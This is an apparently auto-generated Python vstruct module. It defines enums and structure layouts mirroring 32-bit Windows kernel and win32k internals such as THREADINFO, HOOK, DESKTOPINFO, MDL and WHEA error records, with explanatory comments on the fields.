D3DKMDT_MONITOR_TIMING_TYPE = v_enum()
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_UNINITIALIZED = 0
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_ESTABLISHED = 1
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_STANDARD = 2
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_EXTRASTANDARD = 3
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_DETAILED = 4
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_DEFAULTMONITORPROFILE = 5
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_DRIVER = 6
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_MAXVALID = 6
MEMORY_CACHING_TYPE_ORIG = v_enum()
MEMORY_CACHING_TYPE_ORIG.MmFrameBufferCached = 2
DEVICE_TEXT_TYPE = v_enum()
DEVICE_TEXT_TYPE.DeviceTextDescription = 0
DEVICE_TEXT_TYPE.DeviceTextLocationInformation = 1
POWER_ACTION = v_enum()
POWER_ACTION.PowerActionNone = 0
POWER_ACTION.PowerActionReserved = 1
POWER_ACTION.PowerActionSleep = 2
POWER_ACTION.PowerActionHibernate = 3
POWER_ACTION.PowerActionShutdown = 4
POWER_ACTION.PowerActionShutdownReset = 5
POWER_ACTION.PowerActionShutdownOff = 6
POWER_ACTION.PowerActionWarmEject = 7
D3DKMDT_MONITOR_DESCRIPTOR_TYPE = v_enum()
D3DKMDT_MONITOR_DESCRIPTOR_TYPE.D3DKMDT_MDT_UNINITIALIZED = 0
D3DKMDT_MONITOR_DESCRIPTOR_TYPE.D3DKMDT_MDT_VESA_EDID_V1_BASEBLOCK = 1
D3DKMDT_MONITOR_DESCRIPTOR_TYPE.D3DKMDT_MDT_VESA_EDID_V1_BLOCKMAP = 2
D3DKMDT_MONITOR_DESCRIPTOR_TYPE.D3DKMDT_MDT_OTHER = 255
SM_RANGE_TYPES = v_enum()
SM_RANGE_TYPES.SmRangeSharedInfo = 0
SM_RANGE_TYPES.SmRangeNonSharedInfo = 1
SM_RANGE_TYPES.SmRangeBool = 2
WINDOWCOMPOSITIONATTRIB = v_enum()
WINDOWCOMPOSITIONATTRIB.WCA_UNDEFINED = 0
WINDOWCOMPOSITIONATTRIB.WCA_NCRENDERING_ENABLED = 1
WINDOWCOMPOSITIONATTRIB.WCA_NCRENDERING_POLICY = 2
WINDOWCOMPOSITIONATTRIB.WCA_TRANSITIONS_FORCEDISABLED = 3
WINDOWCOMPOSITIONATTRIB.WCA_ALLOW_NCPAINT = 4
WINDOWCOMPOSITIONATTRIB.WCA_CAPTION_BUTTON_BOUNDS = 5
WINDOWCOMPOSITIONATTRIB.WCA_NONCLIENT_RTL_LAYOUT = 6
WINDOWCOMPOSITIONATTRIB.WCA_FORCE_ICONIC_REPRESENTATION = 7
WINDOWCOMPOSITIONATTRIB.WCA_FLIP3D_POLICY = 8
WINDOWCOMPOSITIONATTRIB.WCA_EXTENDED_FRAME_BOUNDS = 9
WINDOWCOMPOSITIONATTRIB.WCA_HAS_ICONIC_BITMAP = 10
WINDOWCOMPOSITIONATTRIB.WCA_THEME_ATTRIBUTES = 11
WINDOWCOMPOSITIONATTRIB.WCA_NCRENDERING_EXILED = 12
WINDOWCOMPOSITIONATTRIB.WCA_NCADORNMENTINFO = 13
WINDOWCOMPOSITIONATTRIB.WCA_EXCLUDED_FROM_LIVEPREVIEW = 14
WINDOWCOMPOSITIONATTRIB.WCA_VIDEO_OVERLAY_ACTIVE = 15
WINDOWCOMPOSITIONATTRIB.WCA_FORCE_ACTIVEWINDOW_APPEARANCE = 16
WINDOWCOMPOSITIONATTRIB.WCA_DISALLOW_PEEK = 17
WINDOWCOMPOSITIONATTRIB.WCA_LAST = 18
# --- Auto-generated vstruct layouts (win32k / Windows kernel mirrors). ---
# Field assignment order in each __init__ defines the parse/serialize order
# of the structure; `_padNNNN` members are explicit alignment padding.
# Do not reorder fields. VArray(...[ ... for i in xrange(1) ]) entries are
# presumably variable-length trailing arrays declared with one element.

# win32k touch input bundle: header plus a trailing tagTOUCHINPUT array.
class tagTOUCHINPUTINFO(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.head = THROBJHEAD()
        self.dwcInputs = v_uint32()
        self.uFlags = v_uint32()
        self.TouchInput = vstruct.VArray([ tagTOUCHINPUT() for i in xrange(1) ])
# win32k window-hook record (linked via phkNext).
class tagHOOK(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.head = THRDESKHEAD()
        self.phkNext = v_ptr32()
        self.iHook = v_uint32()
        self.offPfn = v_uint32()
        self.flags = v_uint32()
        self.ihmod = v_uint32()
        self.ptiHooked = v_ptr32()
        self.rpdesk = v_ptr32()
        self.nTimeout = v_uint32()
# Keyboard layout: virtual-key to wide-char translation table entry.
class VK_TO_WCHAR_TABLE(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pVkToWchars = v_ptr32()
        self.nModifications = v_uint8()
        self.cbSize = v_uint8()
        self._pad0008 = v_bytes(size=2)
# Simple width/height pair (d3dkmdt.h D3DKMDT_2DREGION).
class D3DKMDT_2DREGION(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.cx = v_uint32()
        self.cy = v_uint32()
# Keyboard layout dead-key composition entry.
class DEADKEY(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.dwBoth = v_uint32()
        self.wchComposed = v_uint16()
        self.uFlags = v_uint16()
# Process current directory (ntdll CURDIR): path string plus handle.
class CURDIR(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.DosPath = UNICODE_STRING()
        self.Handle = v_ptr32()
# win32k window property list with trailing tagPROP array.
class tagPROPLIST(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.cEntries = v_uint32()
        self.iFirstFree = v_uint32()
        self.aprop = vstruct.VArray([ tagPROP() for i in xrange(1) ])
# win32k per-desktop info block (shell windows, hook bitmask, etc.).
class tagDESKTOPINFO(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pvDesktopBase = v_ptr32()
        self.pvDesktopLimit = v_ptr32()
        self.spwnd = v_ptr32()
        self.fsHooks = v_uint32()
        self.aphkStart = vstruct.VArray([ v_ptr32() for i in xrange(16) ])
        self.spwndShell = v_ptr32()
        self.ppiShellProcess = v_ptr32()
        self.spwndBkGnd = v_ptr32()
        self.spwndTaskman = v_ptr32()
        self.spwndProgman = v_ptr32()
        self.pvwplShellHook = v_ptr32()
        self.cntMBox = v_uint32()
        self.spwndGestureEngine = v_ptr32()
        self.pvwplMessagePPHandler = v_ptr32()
        self.fComposited = v_uint32()
# Anonymous union/struct member extracted by the generator (name is the
# generator's sequence id). Appears to be the PowerSequence arm of an
# IO_STACK_LOCATION parameters union.
class _unnamed_12849(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.PowerSequence = v_ptr32()
# WHEA error record section descriptor (cper.h): locates one section
# within a Common Platform Error Record.
class WHEA_ERROR_RECORD_SECTION_DESCRIPTOR(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.SectionOffset = v_uint32()
        self.SectionLength = v_uint32()
        self.Revision = WHEA_REVISION()
        self.ValidBits = WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_VALIDBITS()
        self.Reserved = v_uint8()
        self.Flags = WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_FLAGS()
        self.SectionType = GUID()
        self.FRUId = GUID()
        self.SectionSeverity = v_uint32()
        self.FRUText = vstruct.VArray([ v_uint8() for i in xrange(20) ])
# Keyboard layout: virtual-key to NLS function mapping entry.
class VK_TO_FUNCTION_TABLE(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Vk = v_uint8()
        self.NLSFEProcType = v_uint8()
        self.NLSFEProcCurrent = v_uint8()
        self.NLSFEProcSwitch = v_uint8()
        self.NLSFEProc = vstruct.VArray([ VK_FUNCTION_PARAM() for i in xrange(8) ])
        self.NLSFEProcAlt = vstruct.VArray([ VK_FUNCTION_PARAM() for i in xrange(8) ])
# win32k per-thread info (THREADINFO): GDI/USER state for one thread —
# message queues, hooks, desktop links, input state, IME handles.
class tagTHREADINFO(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pEThread = v_ptr32()
        self.RefCount = v_uint32()
        self.ptlW32 = v_ptr32()
        self.pgdiDcattr = v_ptr32()
        self.pgdiBrushAttr = v_ptr32()
        self.pUMPDObjs = v_ptr32()
        self.pUMPDHeap = v_ptr32()
        self.GdiTmpTgoList = LIST_ENTRY()
        self.pRBRecursionCount = v_uint32()
        self.pNonRBRecursionCount = v_uint32()
        self.tlSpriteState = TLSPRITESTATE()
        self.pSpriteState = v_ptr32()
        self.pDevHTInfo = v_ptr32()
        self.ulDevHTInfoUniqueness = v_uint32()
        self.pdcoAA = v_ptr32()
        self.pdcoRender = v_ptr32()
        self.pdcoSrc = v_ptr32()
        self.bEnableEngUpdateDeviceSurface = v_uint8()
        self.bIncludeSprites = v_uint8()
        self._pad00ac = v_bytes(size=2)
        self.ulWindowSystemRendering = v_uint32()
        self.iVisRgnUniqueness = v_uint32()
        self.ptl = v_ptr32()
        self.ppi = v_ptr32()
        self.pq = v_ptr32()
        self.spklActive = v_ptr32()
        self.pcti = v_ptr32()
        self.rpdesk = v_ptr32()
        self.pDeskInfo = v_ptr32()
        self.ulClientDelta = v_uint32()
        self.pClientInfo = v_ptr32()
        self.TIF_flags = v_uint32()
        self.pstrAppName = v_ptr32()
        self.psmsSent = v_ptr32()
        self.psmsCurrent = v_ptr32()
        self.psmsReceiveList = v_ptr32()
        self.timeLast = v_uint32()
        self.idLast = v_uint32()
        self.exitCode = v_uint32()
        self.hdesk = v_ptr32()
        self.cPaintsReady = v_uint32()
        self.cTimersReady = v_uint32()
        self.pMenuState = v_ptr32()
        self.ptdb = v_ptr32()
        self.psiiList = v_ptr32()
        self.dwExpWinVer = v_uint32()
        self.dwCompatFlags = v_uint32()
        self.dwCompatFlags2 = v_uint32()
        self._pad0120 = v_bytes(size=4)
        self.pqAttach = v_ptr32()
        self.ptiSibling = v_ptr32()
        self.pmsd = v_ptr32()
        self.fsHooks = v_uint32()
        self.sphkCurrent = v_ptr32()
        self.lParamHkCurrent = v_uint32()
        self.wParamHkCurrent = v_uint32()
        self.pSBTrack = v_ptr32()
        self.hEventQueueClient = v_ptr32()
        self.pEventQueueServer = v_ptr32()
        self.PtiLink = LIST_ENTRY()
        self.iCursorLevel = v_uint32()
        self.ptLast = tagPOINT()
        self.ptLastReal = tagPOINT()
        self.spwndDefaultIme = v_ptr32()
        self.spDefaultImc = v_ptr32()
        self.hklPrev = v_ptr32()
        self.cEnterCount = v_uint32()
        self.mlPost = tagMLIST()
        self.fsChangeBitsRemoved = v_uint16()
        self.wchInjected = v_uint16()
        self.fsReserveKeys = v_uint32()
        self.apEvent = v_ptr32()
        self.amdesk = v_uint32()
        self.cWindows = v_uint32()
        self.cVisWindows = v_uint32()
        self.aphkStart = vstruct.VArray([ v_ptr32() for i in xrange(16) ])
        self.cti = tagCLIENTTHREADINFO()
        self.hPrevHidData = v_ptr32()
        self.hTouchInputCurrent = v_ptr32()
        self.hGestureInfoCurrent = v_ptr32()
        self.MsgPPInfo = tagMSGPPINFO()
        self.cNestedStableVisRgn = v_uint32()
        self.readyHead = LIST_ENTRY()
        self.fSpecialInitialization = v_uint32()
# Anonymous union arm (generator id 12843): single PowerState dword —
# presumably the SetPower arm of the IRP_MJ_POWER parameters union.
class _unnamed_12843(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.PowerState = v_uint32()
# Video mode signal timing description (d3dkmdt.h D3DKMDT_VIDEO_SIGNAL_INFO).
class D3DKMDT_VIDEO_SIGNAL_INFO(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.VideoStandard = v_uint32()
        self.TotalSize = D3DKMDT_2DREGION()
        self.ActiveSize = D3DKMDT_2DREGION()
        self.VSyncFreq = D3DDDI_RATIONAL()
        self.HSyncFreq = D3DDDI_RATIONAL()
        self.PixelRate = v_uint32()
        self.ScanLineOrdering = v_uint32()
# Hardware resource list header with trailing descriptor array (wdm.h).
class CM_PARTIAL_RESOURCE_LIST(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Version = v_uint16()
        self.Revision = v_uint16()
        self.Count = v_uint32()
        self.PartialDescriptors = vstruct.VArray([ CM_PARTIAL_RESOURCE_DESCRIPTOR() for i in xrange(1) ])
# Opaque handle placeholder (generator emits a single dummy dword).
class HGESTUREINFO(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.unused = v_uint32()
# PnP device power/wake capabilities (wdm.h DEVICE_CAPABILITIES).
class DEVICE_CAPABILITIES(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Size = v_uint16()
        self.Version = v_uint16()
        self.DeviceD1 = v_uint32()
        self.Address = v_uint32()
        self.UINumber = v_uint32()
        self.DeviceState = vstruct.VArray([ DEVICE_POWER_STATE() for i in xrange(7) ])
        self.SystemWake = v_uint32()
        self.DeviceWake = v_uint32()
        self.D1Latency = v_uint32()
        self.D2Latency = v_uint32()
        self.D3Latency = v_uint32()
# Thread-pool direct callback descriptor.
class TP_DIRECT(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Callback = v_ptr32()
        self.NumaNode = v_uint32()
        self.IdealProcessor = v_uint8()
        self._pad000c = v_bytes(size=3)
# win32k monitor record: display rectangles and per-monitor state.
class tagMONITOR(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.head = HEAD()
        self.pMonitorNext = v_ptr32()
        self.dwMONFlags = v_uint32()
        self.rcMonitorReal = tagRECT()
        self.rcWorkReal = tagRECT()
        self.hrgnMonitorReal = v_ptr32()
        self.Spare0 = v_uint16()
        self.cWndStack = v_uint16()
        self.hDev = v_ptr32()
        self.hDevReal = v_ptr32()
        self.DockTargets = vstruct.VArray([ v_uint32() for i in xrange(7) ])
        self.Flink = v_ptr32()
        self.Blink = v_ptr32()
# Anonymous union arm: user APC routine/context pair (IO completion).
class _unnamed_12410(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.UserApcRoutine = v_ptr32()
        self.UserApcContext = v_ptr32()
# Anonymous union arm: IRP_MJ_CREATE parameters shape.
class _unnamed_12558(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.SecurityContext = v_ptr32()
        self.Options = v_uint32()
        self.FileAttributes = v_uint16()
        self.ShareAccess = v_uint16()
        self.EaLength = v_uint32()
# Anonymous union arm: single Type dword.
class _unnamed_12735(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint32()
# Opaque/forward-declared type: generator emitted no fields (zero-length
# placeholder so pointers to it can still resolve).
class KPROCESS(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
# Opaque placeholder (no fields emitted).
class DEVICE_OBJECT_POWER_EXTENSION(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
# GDI font metrics (wingdi.h TEXTMETRICW).
class tagTEXTMETRICW(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.tmHeight = v_uint32()
        self.tmAscent = v_uint32()
        self.tmDescent = v_uint32()
        self.tmInternalLeading = v_uint32()
        self.tmExternalLeading = v_uint32()
        self.tmAveCharWidth = v_uint32()
        self.tmMaxCharWidth = v_uint32()
        self.tmWeight = v_uint32()
        self.tmOverhang = v_uint32()
        self.tmDigitizedAspectX = v_uint32()
        self.tmDigitizedAspectY = v_uint32()
        self.tmFirstChar = v_uint16()
        self.tmLastChar = v_uint16()
        self.tmDefaultChar = v_uint16()
        self.tmBreakChar = v_uint16()
        self.tmItalic = v_uint8()
        self.tmUnderlined = v_uint8()
        self.tmStruckOut = v_uint8()
        self.tmPitchAndFamily = v_uint8()
        self.tmCharSet = v_uint8()
        self._pad003c = v_bytes(size=3)
# WHEA section descriptor flags (bitfield collapsed to one dword here).
class WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_FLAGS(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Primary = v_uint32()
# Thread-pool callback environment, version 3 (winnt.h).
class TP_CALLBACK_ENVIRON_V3(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Version = v_uint32()
        self.Pool = v_ptr32()
        self.CleanupGroup = v_ptr32()
        self.CleanupGroupCancelCallback = v_ptr32()
        self.RaceDll = v_ptr32()
        self.ActivationContext = v_ptr32()
        self.FinalizationCallback = v_ptr32()
        self.u = _unnamed_11730()
        self.CallbackPriority = v_uint32()
        self.Size = v_uint32()
# Opaque handle placeholder (desktop handle).
class HDESK(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.unused = v_uint32()
# Activation context stack frame (ntdll side-by-side support).
class RTL_ACTIVATION_CONTEXT_STACK_FRAME(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Previous = v_ptr32()
        self.ActivationContext = v_ptr32()
        self.Flags = v_uint32()
# Handle attributes + granted access pair (ObReferenceObjectByHandle out).
class OBJECT_HANDLE_INFORMATION(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.HandleAttributes = v_uint32()
        self.GrantedAccess = v_uint32()
# Extended processor state (XSAVE) configuration with 64 feature slots.
class XSTATE_CONFIGURATION(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.EnabledFeatures = v_uint64()
        self.Size = v_uint32()
        self.OptimizedSave = v_uint32()
        self.Features = vstruct.VArray([ XSTATE_FEATURE() for i in xrange(64) ])
# Generic AVL table header (ntddk.h RTL_AVL_TABLE): root node plus the
# caller-supplied compare/allocate/free routine pointers.
class RTL_AVL_TABLE(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.BalancedRoot = RTL_BALANCED_LINKS()
        self.OrderedPointer = v_ptr32()
        self.WhichOrderedElement = v_uint32()
        self.NumberGenericTableElements = v_uint32()
        self.DepthOfTree = v_uint32()
        self.RestartKey = v_ptr32()
        self.DeleteCount = v_uint32()
        self.CompareRoutine = v_ptr32()
        self.AllocateRoutine = v_ptr32()
        self.FreeRoutine = v_ptr32()
        self.TableContext = v_ptr32()
# win32k HID top-level-collection info (usage page/usage plus request counts).
class tagHID_TLC_INFO(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.link = LIST_ENTRY()
        self.usUsagePage = v_uint16()
        self.usUsage = v_uint16()
        self.cDevices = v_uint32()
        self.cDirectRequest = v_uint32()
        self.cUsagePageRequest = v_uint32()
        self.cExcludeRequest = v_uint32()
        self.cExcludeOrphaned = v_uint32()
# WHEA hardware error packet v2 (ntddk.h): header locating the raw and
# PSHED-private error data by offset/length within the packet.
class WHEA_ERROR_PACKET_V2(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Signature = v_uint32()
        self.Version = v_uint32()
        self.Length = v_uint32()
        self.Flags = WHEA_ERROR_PACKET_FLAGS()
        self.ErrorType = v_uint32()
        self.ErrorSeverity = v_uint32()
        self.ErrorSourceId = v_uint32()
        self.ErrorSourceType = v_uint32()
        self.NotifyType = GUID()
        self.Context = v_uint64()
        self.DataFormat = v_uint32()
        self.Reserved1 = v_uint32()
        self.DataOffset = v_uint32()
        self.DataLength = v_uint32()
        self.PshedDataOffset = v_uint32()
        self.PshedDataLength = v_uint32()
# DirectX graphics kernel diagnostics log entry header.
class DXGK_DIAG_HEADER(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint32()
        self.Size = v_uint32()
        self.LogTimestamp = v_uint64()
        self.ProcessName = vstruct.VArray([ v_uint8() for i in xrange(16) ])
        self.ThreadId = v_uint64()
        self.Index = v_uint32()
        self.WdLogIdx = v_uint32()
# Display-mode-manager serialization: a present path plus its target mode set.
class DMM_VIDPNPATHANDTARGETMODESET_SERIALIZATION(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.PathInfo = D3DKMDT_VIDPN_PRESENT_PATH()
        self.TargetModeSet = DMM_VIDPNTARGETMODESET_SERIALIZATION()
# Anonymous union arm: IRP_MJ_PNP QUERY_INTERFACE parameters shape.
class _unnamed_12744(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.InterfaceType = v_ptr32()
        self.Size = v_uint16()
        self.Version = v_uint16()
        self.Interface = v_ptr32()
        self.InterfaceSpecificData = v_ptr32()
# Keyboard layout VK->WCHAR row with a single modifier column.
class VK_TO_WCHARS1(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.VirtualKey = v_uint8()
        self.Attributes = v_uint8()
        self.wch = vstruct.VArray([ v_uint16() for i in xrange(1) ])
# Executive resource owner-table entry.
class OWNER_ENTRY(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.OwnerThread = v_uint32()
        self.IoPriorityBoosted = v_uint32()
# Device object extension (wdm.h DEVOBJ_EXTENSION): PnP/power bookkeeping
# hanging off every DEVICE_OBJECT.
class DEVOBJ_EXTENSION(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint16()
        self.Size = v_uint16()
        self.DeviceObject = v_ptr32()
        self.PowerFlags = v_uint32()
        self.Dope = v_ptr32()
        self.ExtensionFlags = v_uint32()
        self.DeviceNode = v_ptr32()
        self.AttachedTo = v_ptr32()
        self.StartIoCount = v_uint32()
        self.StartIoKey = v_uint32()
        self.StartIoFlags = v_uint32()
        self.Vpb = v_ptr32()
        self.DependentList = LIST_ENTRY()
        self.ProviderList = LIST_ENTRY()
# Monitor frequency range constraint (d3dkmdt.h).
class D3DKMDT_MONITOR_FREQUENCY_RANGE(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Origin = v_uint32()
        self.RangeLimits = D3DKMDT_FREQUENCY_RANGE()
        self.ConstraintType = v_uint32()
        self.Constraint = _unnamed_13453()
# win32k message queue (Q): input state, focus/capture windows, key state.
class tagQ(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.mlInput = tagMLIST()
        self.ptiSysLock = v_ptr32()
        self.idSysLock = v_uint32()
        self.idSysPeek = v_uint32()
        self.ptiMouse = v_ptr32()
        self.ptiKeyboard = v_ptr32()
        self.spwndCapture = v_ptr32()
        self.spwndFocus = v_ptr32()
        self.spwndActive = v_ptr32()
        self.spwndActivePrev = v_ptr32()
        self.codeCapture = v_uint32()
        self.msgDblClk = v_uint32()
        self.xbtnDblClk = v_uint16()
        self._pad003c = v_bytes(size=2)
        self.timeDblClk = v_uint32()
        self.hwndDblClk = v_ptr32()
        self.ptDblClk = tagPOINT()
        self.ptMouseMove = tagPOINT()
        self.afKeyRecentDown = vstruct.VArray([ v_uint8() for i in xrange(32) ])
        self.afKeyState = vstruct.VArray([ v_uint8() for i in xrange(64) ])
        self.caret = tagCARET()
        self.spcurCurrent = v_ptr32()
        self.iCursorLevel = v_uint32()
        self.QF_flags = v_uint32()
        self.cThreads = v_uint16()
        self.cLockCount = v_uint16()
        self.msgJournal = v_uint32()
        self.ExtraInfo = v_uint32()
        self.ulEtwReserved1 = v_uint32()
# win32k window class record (CLS): registered window-class attributes.
class tagCLS(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pclsNext = v_ptr32()
        self.atomClassName = v_uint16()
        self.atomNVClassName = v_uint16()
        self.fnid = v_uint16()
        self._pad000c = v_bytes(size=2)
        self.rpdeskParent = v_ptr32()
        self.pdce = v_ptr32()
        self.hTaskWow = v_uint16()
        self.CSF_flags = v_uint16()
        self.lpszClientAnsiMenuName = v_ptr32()
        self.lpszClientUnicodeMenuName = v_ptr32()
        self.spcpdFirst = v_ptr32()
        self.pclsBase = v_ptr32()
        self.pclsClone = v_ptr32()
        self.cWndReferenceCount = v_uint32()
        self.style = v_uint32()
        self.lpfnWndProc = v_ptr32()
        self.cbclsExtra = v_uint32()
        self.cbwndExtra = v_uint32()
        self.hModule = v_ptr32()
        self.spicn = v_ptr32()
        self.spcur = v_ptr32()
        self.hbrBackground = v_ptr32()
        self.lpszMenuName = v_ptr32()
        self.lpszAnsiClassName = v_ptr32()
        self.spicnSm = v_ptr32()
# win32k call-proc data: window-proc thunk bookkeeping.
class CALLPROCDATA(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.head = PROCDESKHEAD()
        self.spcpdNext = v_ptr32()
        self.pfnClientPrevious = v_uint32()
        self.wType = v_uint16()
        self._pad0020 = v_bytes(size=2)
# Window-message name table entry (debug/metadata).
class WM_VALUES_STRINGS(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pszName = v_ptr32()
        self.fInternal = v_uint8()
        self.fDefined = v_uint8()
        self._pad0008 = v_bytes(size=2)
# Anonymous union arm: DMA channel/port resource descriptor shape.
class _unnamed_16080(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Channel = v_uint32()
        self.Port = v_uint32()
        self.Reserved1 = v_uint32()
# Opaque handle placeholder (IME input context handle).
class HIMC(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.unused = v_uint32()
# Anonymous union arm: generic start/length resource range.
class _unnamed_16086(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Start = v_uint32()
        self.Length = v_uint32()
        self.Reserved = v_uint32()
# Counted unicode string with 32-bit lengths (win32k LARGE_UNICODE_STRING).
class LARGE_UNICODE_STRING(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint32()
        self.MaximumLength = v_uint32()
        self.Buffer = v_ptr32()
# Security access-check state (wdm.h ACCESS_STATE): carries the subject
# context, requested/granted masks, and audit bookkeeping during an open.
class ACCESS_STATE(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.OperationID = LUID()
        self.SecurityEvaluated = v_uint8()
        self.GenerateAudit = v_uint8()
        self.GenerateOnClose = v_uint8()
        self.PrivilegesAllocated = v_uint8()
        self.Flags = v_uint32()
        self.RemainingDesiredAccess = v_uint32()
        self.PreviouslyGrantedAccess = v_uint32()
        self.OriginalDesiredAccess = v_uint32()
        self.SubjectSecurityContext = SECURITY_SUBJECT_CONTEXT()
        self.SecurityDescriptor = v_ptr32()
        self.AuxData = v_ptr32()
        self.Privileges = _unnamed_13037()
        self.AuditPrivileges = v_uint8()
        self._pad0064 = v_bytes(size=3)
        self.ObjectName = UNICODE_STRING()
        self.ObjectTypeName = UNICODE_STRING()
# Opaque placeholder (no fields emitted).
class TP_CALLBACK_INSTANCE(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
# Win32 RECT: left/top/right/bottom edges.
class tagRECT(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.left = v_uint32()
        self.top = v_uint32()
        self.right = v_uint32()
        self.bottom = v_uint32()
# Per-thread GDI call batching buffer (lives in the TEB).
class GDI_TEB_BATCH(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Offset = v_uint32()
        self.HDC = v_uint32()
        self.Buffer = vstruct.VArray([ v_uint32() for i in xrange(310) ])
# Anonymous union arm: 64-bit start address + length resource range.
class _unnamed_16100(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Start = LARGE_INTEGER()
        self.Length64 = v_uint32()
# Opaque placeholder (extra create parameter list).
class ECP_LIST(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
# win32k menu interaction state: popup tracking, drag state, animation.
class tagMENUSTATE(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pGlobalPopupMenu = v_ptr32()
        self.fMenuStarted = v_uint32()
        self.ptMouseLast = tagPOINT()
        self.mnFocus = v_uint32()
        self.cmdLast = v_uint32()
        self.ptiMenuStateOwner = v_ptr32()
        self.dwLockCount = v_uint32()
        self.pmnsPrev = v_ptr32()
        self.ptButtonDown = tagPOINT()
        self.uButtonDownHitArea = v_uint32()
        self.uButtonDownIndex = v_uint32()
        self.vkButtonDown = v_uint32()
        self.uDraggingHitArea = v_uint32()
        self.uDraggingIndex = v_uint32()
        self.uDraggingFlags = v_uint32()
        self.hdcWndAni = v_ptr32()
        self.dwAniStartTime = v_uint32()
        self.ixAni = v_uint32()
        self.iyAni = v_uint32()
        self.cxAni = v_uint32()
        self.cyAni = v_uint32()
        self.hbmAni = v_ptr32()
        self.hdcAni = v_ptr32()
# File object's section pointers (cache manager / memory manager links).
class SECTION_OBJECT_POINTERS(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.DataSectionObject = v_ptr32()
        self.SharedCacheMap = v_ptr32()
        self.ImageSectionObject = v_ptr32()
# Memory descriptor list header (wdm.h MDL).
class MDL(vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Next = v_ptr32()
        self.Size = v_uint16()
        self.MdlFlags = v_uint16()
        self.Process = v_ptr32()
        self.MappedSystemVa = v_ptr32()
        self.StartVa = v_ptr32()
